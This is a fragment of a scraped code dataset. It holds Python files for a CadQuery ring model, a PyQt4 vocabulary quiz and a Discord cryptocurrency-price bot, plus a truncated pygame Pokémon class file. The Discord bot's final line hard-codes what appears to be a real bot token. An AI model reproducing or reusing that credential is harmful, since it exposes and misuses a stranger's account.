"usage_type": "call"}, {"api_name": "wx.App", "line_number": 76, "usage_type": "attribute"}]}
+{"seq_id": "29460816112", "text": "import cadquery as cq\nfrom . import Base\nfrom cadqueryhelper import shape\nfrom cqterrain import Ladder\n\nclass Ring(Base):\n def __init__(self):\n super().__init__()\n self.cut_diameter = 76\n self.diameter = self.cut_diameter + 10\n self.inset = 5\n self.height = 10\n\n self.render_ladders = True\n self.ladder_height = 71\n self.ladder_length = 25\n self.ladder_width = 10\n self.ladder_cut_padding = 1.5\n self.ladder_cut_chamfer = 2\n\n self.ring = None\n self.cut_ladders = None\n self.ladders = None\n self.cut_ring = None\n\n def __make_ring(self):\n ring = shape.cone(\n radius=self.diameter/2,\n radius_top=self.diameter/2-self.inset,\n height=self.height\n )\n\n cut_ring = (\n cq.Workplane(\"XY\")\n .cylinder(self.ladder_height, self.cut_diameter/2)\n )\n\n ring_slice = (cq.Workplane(\"XY\").box(10,.5,self.height))\n\n self.cut_ring = cut_ring.translate((0,0,self.ladder_height/2))\n self.ring = (\n ring.cut(cut_ring)\n .translate((0,0,self.height/2))\n .cut(ring_slice.translate((self.diameter/2-.1,0,self.height/2)))\n )\n\n def __make_cut_ladders(self):\n x_translate = self.cut_diameter/2+self.ladder_length/2+self.ladder_cut_padding\n cut_ladder = (\n cq.Workplane(\"XY\")\n .box(self.ladder_length,self.ladder_length,self.height)\n .faces(\"X or -X\")\n .edges(\"Z\")\n .chamfer(self.ladder_cut_chamfer)\n .translate((\n 0,\n x_translate,\n self.height/2\n ))\n )\n\n cut_ladders = (\n cq.Workplane(\"XY\")\n .union(cut_ladder)\n .union(cut_ladder.rotate((0,0,1),(0,0,0),180))\n )\n self.cut_ladders = cut_ladders\n\n def __make_ladder(self):\n bp = Ladder()\n bp.length = self.ladder_length\n bp.width = self.ladder_width\n bp.height = self.ladder_height\n bp.make()\n bp.rungs = bp.rungs.translate((0,self.ladder_width/4,0))\n\n ladder = bp.build()\n\n ladder = ladder.translate((\n 0,\n self.cut_diameter/2+.6,\n self.ladder_height/2\n )).cut(self.cut_ring)\n\n ladders = (\n cq.Workplane()\n .union(ladder)\n .union(ladder.rotate((0,0,1),(0,0,0),180))\n )\n\n #show_object(ladders)\n\n self.ladders = ladders\n\n def make(self):\n super().make()\n self.__make_ring()\n\n if self.render_ladders:\n self.__make_cut_ladders()\n self.__make_ladder()\n\n def build(self):\n super().build()\n scene = (\n cq.Workplane(\"XY\")\n .union(self.ring)\n )\n\n if self.render_ladders and self.ladders:\n scene = (\n scene\n .cut(self.cut_ladders)\n .add(self.ladders)\n )\n return scene\n", "repo_name": "medicationforall/cqindustry", "sub_path": "src/cqindustry/Ring.py", "file_name": "Ring.py", "file_ext": "py", "file_size_in_byte": 3063, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cadqueryhelper.shape.cone", "line_number": 27, "usage_type": "call"}, {"api_name": "cadqueryhelper.shape", "line_number": 27, "usage_type": "name"}, {"api_name": "cadquery.Workplane", "line_number": 34, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 38, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 50, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 63, "usage_type": "call"}, {"api_name": "cqterrain.Ladder", "line_number": 70, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 86, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "9650187284", "text": "#!usr/bin/python\n### coding: utf-8\n#__author__ = 'Przemyslaw Teodorski'\n\nimport sys\nfrom functools import partial\nfrom PyQt4 import QtGui\nfrom databaseObjects import Word, Answer\nfrom model import Interface\n\n\nclass MainWindowOld(QtGui.QMainWindow):\n\n #languages = {1: }\n\n spanishButtonLabel = str('Español')\n spanishSpecialCharacters = ['ñ', 'ó', 'á', 'ú', 'é', 'í']\n mode = {'es', 'en'}\n\n englishButtonLabel = str('English')\n\n def __init__(self):\n super(MainWindowOld, self).__init__()\n\n def initUI(self, onAddWordModel, closeConnection, onStartTestModel, onCheckAnswerModel,\n onNextTestWordModel, onContinueWithTest):\n\n self.onAddWordModel = onAddWordModel\n self.closeConnection = closeConnection\n self.onStartTestModel = onStartTestModel\n self.onCheckAnswerModel = onCheckAnswerModel\n self.onNextTestWordModel = onNextTestWordModel\n self.continueWithTest = onContinueWithTest\n\n self.spanishButton = QtGui.QPushButton(self.spanishButtonLabel)\n self.spanishButton.clicked.connect(self.onSpanishDict)\n\n self.englishButton = QtGui.QPushButton(self.englishButtonLabel)\n self.englishButton.clicked.connect(self.onEnglishDict)\n\n self.mainWidget = QtGui.QWidget()\n mainLayout = QtGui.QGridLayout()\n mainLayout.addWidget(self.spanishButton, 0,0,2,1)\n mainLayout.addWidget(self.englishButton, 1,0,2,1)\n self.mainWidget.setLayout(mainLayout)\n\n self.setCentralWidget(self.mainWidget)\n self.setGeometry(200, 200, 600, 500)\n self.setWindowTitle('Words Memory')\n self.show()\n\n def onSpanishDict(self):\n self.languageMode = 1\n self.addWordButton = QtGui.QPushButton('Añadir una palabra')\n self.addWordButton.clicked.connect(self.onAddWordWindow)\n\n self.startTestButton = QtGui.QPushButton('Empezar test')\n self.startTestButton.clicked.connect(self.onStartTest)\n\n subWidget = QtGui.QWidget()\n newLayout = QtGui.QGridLayout()\n newLayout.addWidget(self.addWordButton, 0,0,2,1)\n newLayout.addWidget(self.startTestButton, 1,0,2,1)\n subWidget.setLayout(newLayout)\n\n self.setCentralWidget(subWidget)\n\n def onEnglishDict(self):\n self.languageMode = 2\n self.addWordButton = QtGui.QPushButton('Add new word')\n self.addWordButton.clicked.connect(self.onAddWordWindow)\n\n self.startTestButton = QtGui.QPushButton('Start test')\n self.startTestButton.clicked.connect(self.onStartTest)\n\n subWidget = QtGui.QWidget()\n newLayout = QtGui.QGridLayout()\n newLayout.addWidget(self.addWordButton, 0,0,2,1)\n newLayout.addWidget(self.startTestButton, 1,0,2,1)\n subWidget.setLayout(newLayout)\n\n self.setCentralWidget(subWidget)\n\n def swapToSpanishCharacters(self, text):\n if len(text):\n root = str(text)[0:-1]\n l = str(text)[-1]\n if l == 'ń':\n self.newWordLine.setText(root + 'ñ')\n elif l == 'ó':\n self.newWordLine.setText(root + 'ó')\n elif l == 'ą':\n self.newWordLine.setText(root + 'á')\n elif l == 'ę':\n self.newWordLine.setText(root + 'é')\n\n\n def onAddWordWindow(self):\n self.newWordLine = QtGui.QLineEdit()\n #connect newWordLine with spanish characters\n self.newWordLine.textEdited.connect(self.swapToSpanishCharacters)\n\n self.translation = QtGui.QLineEdit()\n self.enTranslation = QtGui.QLineEdit()\n self.comment = QtGui.QPlainTextEdit()\n\n wordLabel = QtGui.QLabel('Palabra')\n translationLabel = QtGui.QLabel('Traslación polaco')\n enTranslationLabel = QtGui.QLabel('Traslación ingles')\n commentLabel = QtGui.QLabel('Comentario')\n\n self.acceptButton = QtGui.QPushButton('Ok')\n self.acceptButton.clicked.connect(self.onAcceptNewWord)\n\n self.cancelButton = QtGui.QPushButton('Cancel')\n self.cancelButton.clicked.connect(self.onCancelAddWord)\n\n layout = QtGui.QGridLayout()\n layout.addWidget(self.getWidgetSpecialLetters(), 0, 0, 1, 2)\n layout.addWidget(wordLabel, 1, 0, 1, 1)\n layout.addWidget(self.newWordLine, 1, 1, 1, 2)\n layout.addWidget(translationLabel, 2, 0, 1, 1)\n layout.addWidget(self.translation, 2, 1, 1, 2)\n\n layout.addWidget(enTranslationLabel, 3, 0, 1, 1)\n layout.addWidget(self.enTranslation, 3, 1, 1, 2)\n\n layout.addWidget(commentLabel, 4, 0, 1, 1)\n layout.addWidget(self.comment, 4, 1, 1, 2)\n\n layout.addWidget(self.acceptButton, 5, 0, 1, 1)\n layout.addWidget(self.cancelButton, 6, 0, 1, 1)\n\n subWidget = QtGui.QWidget()\n subWidget.setLayout(layout)\n self.setCentralWidget(subWidget)\n\n def getWidgetSpecialLetters(self):\n if self.languageMode == 1:\n #spanish dictionary\n buttonWidget = QtGui.QWidget()\n layout = QtGui.QHBoxLayout()\n for i in self.spanishSpecialCharacters:\n b = QtGui.QPushButton(str(i))\n t = b.text()\n b.clicked.connect(partial(self.onSpecialCharacterClicked, t))\n layout.addWidget(b)\n buttonWidget.setLayout(layout)\n return buttonWidget\n\n else :\n pass\n\n def onSpecialCharacterClicked(self, other):\n text = self.newWordLine.text()\n text += other\n self.newWordLine.setText(text)\n\n def checkAnswer(self):\n a = str(self.translation.text())\n self.onCheckAnswerModel(a)\n\n def onStartTest(self):\n self.onStartTestModel(self.languageMode)\n\n def showTestView(self):\n self.newWordLine = QtGui.QLabel()\n\n self.translation = QtGui.QLineEdit()\n self.enTranslation = QtGui.QLineEdit()\n\n self.correctPLTranslation = QtGui.QLineEdit()\n self.correctPLTranslation.setReadOnly(True)\n self.correctPLTranslation.hide()\n\n self.comment = QtGui.QPlainTextEdit()\n self.comment.hide()\n\n wordLabel = QtGui.QLabel('Palabra')\n translationLabel = QtGui.QLabel('Traslación polaco')\n enTranslationLabel = QtGui.QLabel('Traslación ingles')\n commentLabel = QtGui.QLabel('Comentario')\n\n self.nextButton = QtGui.QPushButton('Siguiente')\n self.nextButton.clicked.connect(self.onNextTestWordModel)\n\n self.acceptButton = QtGui.QPushButton('Ok')\n self.acceptButton.clicked.connect(self.checkAnswer)\n\n self.cancelButton = QtGui.QPushButton('Cancelar')\n self.cancelButton.clicked.connect(self.onCancelAddWord)\n\n layout = QtGui.QGridLayout()\n layout.addWidget(self.getWidgetSpecialLetters(), 0, 0, 1, 2)\n layout.addWidget(wordLabel, 2, 0, 1, 1)\n layout.addWidget(self.newWordLine, 2, 1, 1, 1)\n\n layout.addWidget(translationLabel, 3, 0, 1, 1)\n layout.addWidget(self.translation, 3, 1, 1, 1)\n layout.addWidget(self.correctPLTranslation, 4, 1, 1, 1)\n\n layout.addWidget(enTranslationLabel, 5, 0, 1, 1)\n layout.addWidget(self.enTranslation, 5, 1, 1, 1)\n\n layout.addWidget(commentLabel, 6, 0, 1, 1)\n layout.addWidget(self.comment, 6, 1, 1, 2)\n\n layout.addWidget(self.nextButton, 7, 0, 1, 1)\n layout.addWidget(self.acceptButton, 7, 1, 1, 1)\n layout.addWidget(self.cancelButton, 8, 0, 1, 1)\n\n subWidget = QtGui.QWidget()\n subWidget.setLayout(layout)\n self.setCentralWidget(subWidget)\n\n def windowContinue(self):\n label = ('Continuar con las palabras que no supiste?')\n ret = QtGui.QMessageBox.question(self, 'Atención', label, QtGui.QMessageBox.Cancel | QtGui.QMessageBox.Ok,\n QtGui.QMessageBox.Ok)\n if ret == QtGui.QMessageBox.Ok:\n self.continueWithTest()\n\n def congratulations(self):\n pass\n\n def onCancelAddWord(self):\n if self.languageMode == 1:\n self.onSpanishDict()\n else:\n pass\n\n def clearFields(self):\n self.translation.setText('')\n self.enTranslation.setText('')\n self.newWordLine.setText('')\n self.comment.setText('')\n\n def onAcceptNewWord(self):\n print('accept ui')\n newWord = str(self.newWordLine.text())\n polishTranslation = str(self.translation.text())\n englishTranslation = str(self.enTranslation.text())\n comment = str(self.comment)\n w = Word(self.languageMode, newWord, polishTranslation, englishTranslation, comment=comment)\n self.onAddWordModel(w)\n self.clearFields()\n\n def validateNewWord(self):\n if str(self.newWordLine.text()) == None:\n return False\n elif str(self.translation.text()) == None:\n return False\n\n def closeEvent(self, event):\n self.closeConnection()\n event.accept()\n print('after close event')\n\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n ui = MainWindowOld()\n interface = Interface(ui);\n #ui.initUI()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()", "repo_name": "przemek1899/wordsMemory_Desktop_pyqt4", "sub_path": "mainWindowOld.py", "file_name": "mainWindowOld.py", "file_ext": "py", "file_size_in_byte": 9193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PyQt4.QtGui.QMainWindow", "line_number": 12, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 38, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 57, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 60, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 60, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 70, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 70, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 73, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 76, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 99, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 103, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPlainTextEdit", "line_number": 105, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 105, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 107, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 107, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 108, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 108, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 109, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 110, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 112, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 112, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 115, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 115, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 118, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 118, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 134, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 134, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 141, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 141, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QHBoxLayout", "line_number": 142, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 142, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 144, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 144, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 146, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 167, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 167, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 169, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 169, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 170, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 170, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 172, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 172, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPlainTextEdit", "line_number": 176, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 176, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 179, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 179, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 180, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 180, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 181, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 181, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 182, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 182, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 184, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 184, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 187, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 187, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 190, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 190, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 193, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 193, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 212, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 212, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.question", "line_number": 218, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 218, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 218, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 219, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 219, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 220, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 220, "usage_type": "name"}, {"api_name": "databaseObjects.Word", "line_number": 244, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 261, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 261, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 261, "usage_type": "attribute"}, {"api_name": "model.Interface", "line_number": 263, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 265, "usage_type": "call"}]}
+{"seq_id": "20314321154", "text": "#!/usr/bin/env python3\n\nimport discord\nfrom discord.ext.commands import Bot\nfrom discord.ext import commands\nimport asyncio\nimport time\nimport io\nimport json\n\n\nClient = discord.Client()\nclient = commands.Bot(command_prefix = \"$\")\n\n\n@client.event\nasync def on_ready():\n print(\"Bot is online and connected to Discord\")\n\n\n@client.event\nasync def on_message(message):\n\tif message.content.upper().startswith('$'):\n\t\targs = message.content.split(\" \")\n\t\ttry:\n\t\t\tprint(args[0] + args[1])\n\t\t\tcoinShort, coinAmount, coinLong, coinPriceUSD, coinPriceBTC, coinValueUSD, coinValueBTC = getPrice(args)\n\t\t\tembed = discord.Embed(title=coinLong + ' (' + coinShort + ')', description= str(coinAmount) + ' ' + str(coinLong) + ' is worth: $' + str(coinValueUSD) + ' or ₿' + str(coinValueBTC), color=0x00ff00)\n\t\t\tawait client.send_message(message.channel, embed=embed)\n\t\texcept:\n\t\t\tcoinLong, coinShort, coinRank, coinMarketcap, coinPriceUSD, coinPriceBTC, coinVolume, coinChange1h, coinChange1d, coinChange7d = getTicker(str(message.content).replace('$','').upper())\n\t\t\tembed = discord.Embed(title=coinLong + ' (' + coinShort + ')', description= '**Rank: **' + str(coinRank) + '\\n' + '**Marketcap: **' + str(coinMarketcap) + '\\n' + '**Volume 24H: **' + str(coinVolume) + '\\n\\n' + '**Price USD: **' + str(coinPriceUSD) + '\\n' + '**Price BTC: **' + str(coinPriceBTC) + '\\n\\n' + '**Change 1 hour: **' + str(coinChange1h) + '\\n' + '**Change 1 day: **' + str(coinChange1d) + '\\n' + '**Change 7 days: **' + str(coinChange7d), color=0x00ff00)\n\t\t\tawait client.send_message(message.channel, embed=embed)\n\ndef getTicker(coin):\n\twith io.open('/home/ExchangeData/APIData.json', 'r', encoding='utf8') as outfile:\n\t\toutfileRead = outfile.read() \n\t\tdict = json.loads(outfileRead)\n\t\ttry:\n\t\t\tcoinLong = dict[coin]['name'].replace('-', ' ')\n\t\t\tcoinShort = dict[coin]['shortname']\n\t\t\tcoinRank = str('#' + str(dict[coin]['rank'])) if dict[coin]['rank'] else '?'\n\t\t\tcoinMarketcap = str('$' + str(\"{:,}\".format(round(float(dict[coin]['marketcap']),0)))).replace('.0','') if dict[coin]['marketcap'] else '?'\n\t\t\tcoinPriceUSD = '$' + dict[coin]['average_price_USD']\n\t\t\tcoinPriceBTC = '₿' + str(round(float(dict[coin]['average_price_BTC']),5)) if float(dict[coin]['average_price_BTC']) > 0.01 else '₿' + str(round(float(dict[coin]['average_price_BTC']),9))\n\t\t\tcoinVolume = '$' + str(\"{:,}\".format(round(float(dict[coin]['total_volume']),2)))\n\t\t\tcoinChange1h = str(round(float(dict[coin]['percent_change_1h_USD']),2))+ '%' if dict[coin]['percent_change_1h_USD'] else '?'\n\t\t\tcoinChange1d = str(round(float(dict[coin]['percent_change_24h_USD']),2))+ '%' if dict[coin]['percent_change_24h_USD'] else '?'\n\t\t\tcoinChange7d = str(round(float(dict[coin]['percent_change_7d_USD']),2))+ '%' if dict[coin]['percent_change_7d_USD'] else '?'\n\t\t\tif coinChange1h != '?':\n\t\t\t\tcoinChange1h = str('▼ ' + coinChange1h) if '-' in dict[coin]['percent_change_1h_USD'] else str('▲ ' + coinChange1h)\n\t\t\tif coinChange1d != '?':\n\t\t\t\tcoinChange1d = str('▼ ' + coinChange1d) if '-' in dict[coin]['percent_change_24h_USD'] else str('▲ ' + coinChange1d)\n\t\t\tif coinChange7d != '?':\n\t\t\t\tcoinChange7d = str('▼ ' + coinChange7d) if '-' in dict[coin]['percent_change_7d_USD'] else str('▲ ' + coinChange7d)\n\t\t\treturn coinLong, coinShort, coinRank, coinMarketcap, coinPriceUSD, coinPriceBTC, coinVolume, coinChange1h, coinChange1d, coinChange7d\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tmessageToSend = 'Unknown Coin'\n\t\t\treturn messageToSend\n\t\t\ndef getPrice(args):\n\tcoinShort = str(args[0]).replace('$','').upper()\n\tcoinAmount = float(args[1])\n\twith io.open('/home/ExchangeData/APIData.json', 'r', encoding='utf8') as outfile:\n\t\toutfileRead = outfile.read() \n\t\tdict = json.loads(outfileRead)\n\t\tcoinLong = dict[coinShort]['name'].replace('-', ' ')\n\t\tcoinPriceUSD = float(dict[coinShort]['average_price_USD'])\n\t\tcoinPriceBTC = float(dict[coinShort]['average_price_BTC'])\n\tcoinValueUSD = str(round((coinPriceUSD * coinAmount),2))\n\tcoinValueBTC = str(coinPriceBTC * coinAmount)\n\treturn coinShort, coinAmount, coinLong, coinPriceUSD, coinPriceBTC, coinValueUSD, coinValueBTC\n\t\t\n\t\n\nclient.run(\"NDcwMjAwNTExMjk2MTc2MTI4.DjS0EA.JJOk9QeHquRyO95nlaMrz-RCCkI\") #Replace token with your bots token\n\t", "repo_name": "Eddie-The-Eagle/Cryptotracker", "sub_path": "DiscordBot/DiscordBot.py", "file_name": "DiscordBot.py", "file_ext": "py", "file_size_in_byte": 4224, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "discord.Client", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.ext.commands.Bot", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 28, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 32, "usage_type": "call"}, {"api_name": "io.open", "line_number": 36, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "io.open", "line_number": 65, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "10734157754", "text": "'''\r\nTitle:\r\nAuthor: Nikhil Nayyar\r\nDate Created: 16/05/19\r\n'''\r\nimport pygame, random, time\r\n\r\n### Classes\r\nclass myClass:\r\n\tdef __init__(self, x=0, y=0):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.pos = (self.x, self.y)\r\n\t\tself.surface = pygame.Surface((0, 0), pygame.SRCALPHA, 32)\r\n\t\tself.red = 0\r\n\t\tself.green = 0\r\n\t\tself.blue = 0\r\n\t\tself.colour = (self.red, self.green, self.blue)\r\n\r\n\tdef getSurface(self): # encapsulation\r\n\t\treturn self.surface\r\n\r\n\tdef getPos(self):\r\n\t\treturn self.pos\r\n\r\n\tdef getX(self):\r\n\t\treturn self.x\r\n\r\n\tdef getY(self):\r\n\t\treturn self.y\r\n\r\n\tdef getWidth(self):\r\n\t\treturn self.width\r\n\r\n\tdef getHeight(self):\r\n\t\treturn self.height\r\n\r\n\tdef setPos(self, pos):\r\n\t\tself.x = pos[0]\r\n\t\tself.y = pos[1]\r\n\t\tself.pos = (self.x, self.y)\r\n\r\n\tdef setColour(self, colour):\r\n\t\tself.colour = colour\r\n\r\n\r\nclass box(myClass):\r\n\tdef __init__(self, width, height, x=0, y=0):\r\n\t\tmyClass.__init__(self, x, y)\r\n\t\tself.width = width\r\n\t\tself.height = height\r\n\t\tself.dim = (self.width, self.height)\r\n\t\tself.surface = pygame.Surface(self.dim, pygame.SRCALPHA, 32)\r\n\t\tself.surface.fill(self.colour)\r\n\r\n\tdef setColour(self, colour):\r\n\t\tself.colour = colour\r\n\t\tself.surface.fill(self.colour)\r\n\r\n\r\nclass text(myClass):\r\n\tdef __init__(self, content, fontSize=24):\r\n\t\tmyClass.__init__(self)\r\n\t\tself.width = self.surface.get_rect()[2]\r\n\t\tself.height = self.surface.get_rect()[3]\r\n\t\tself.font = 'Pokemon GB.ttf'\r\n\t\tself.fontFam = self.font\r\n\t\tself.fontSize = fontSize\r\n\t\tself.font = pygame.font.SysFont(self.fontFam, self.fontSize)\r\n\t\tself.content = content\r\n\t\tself.surface = self.font.render(self.content, 1, self.colour)\r\n\r\n\tdef setColour(self, colour):\r\n\t\tmyClass.setColour(self, colour)\r\n\t\tself.surface = self.font.render(self.content, 1, self.colour)\r\n\r\n\tdef setFont(self, fontFam):\r\n\t\tself.fontFam = fontFam\r\n\t\tself.font = pygame.font.SysFont(self.fontFam, self.fontSize)\r\n\t\tself.surface = self.font.render(self.content, 1, self.colour)\r\n\r\n\tdef setContent(self, content):\r\n\t\tself.content = content\r\n\t\tself.surface = self.font.render(self.content, 1, self.colour)\r\n\r\n\tdef getText(self):\r\n\t\treturn myClass.getSurface(self)\r\n\r\n\r\nclass mySprite(myClass):\r\n\tdef __init__(self, fileName):\r\n\t\tmyClass.__init__(self)\r\n\t\tself.surface = pygame.image.load(fileName).convert_alpha()\r\n\t\tself.width = self.surface.get_rect()[2]\r\n\t\tself.height = self.surface.get_rect()[3]\r\n\r\n\tdef resize(self, width, height):\r\n\t\tself.width = width\r\n\t\tself.height = height\r\n\t\tself.dim = (self.width, self.height)\r\n\t\tself.surface = pygame.transform.smoothscale(self.getSurface(), self.dim)\r\n\r\n\tdef rotate(self):\r\n\t\tself.surface = pygame.transform.rotate(self.surface, 270)\r\n\r\n\r\nclass attack(mySprite):\r\n\tdef __init__(self, filename, name, damage, powerPoints, type, attackType, accuracy):\r\n\t\tmySprite.__init__(self, filename)\r\n\t\tself.name = name\r\n\t\tself.damage = damage\r\n\t\tself.powerPoints = powerPoints\r\n\t\tself.type = type\r\n\t\tself.attackType = attackType\r\n\t\tself.accuracy = accuracy\r\n\r\n\tdef getDamage(self):\r\n\t\treturn self.damage\r\n\r\n\tdef getType(self):\r\n\t\treturn self.type\r\n\r\n\tdef getAttackType(self):\r\n\t\treturn self.attackType\r\n\r\n\tdef getAccuracy(self):\r\n\t\treturn self.accuracy\r\n\r\n\tdef getName(self):\r\n\t\treturn self.name\r\n\r\n\tdef __str__(self):\r\n\t\treturn self.name\r\n\r\n\r\nclass pokemon(mySprite):\r\n\tdef __init__(self, name, filename, type, stats, attacks, weakness, resistance, immunites):\r\n\t\tmySprite.__init__(self, filename)\r\n\t\tself.name = name\r\n\t\tself.type = 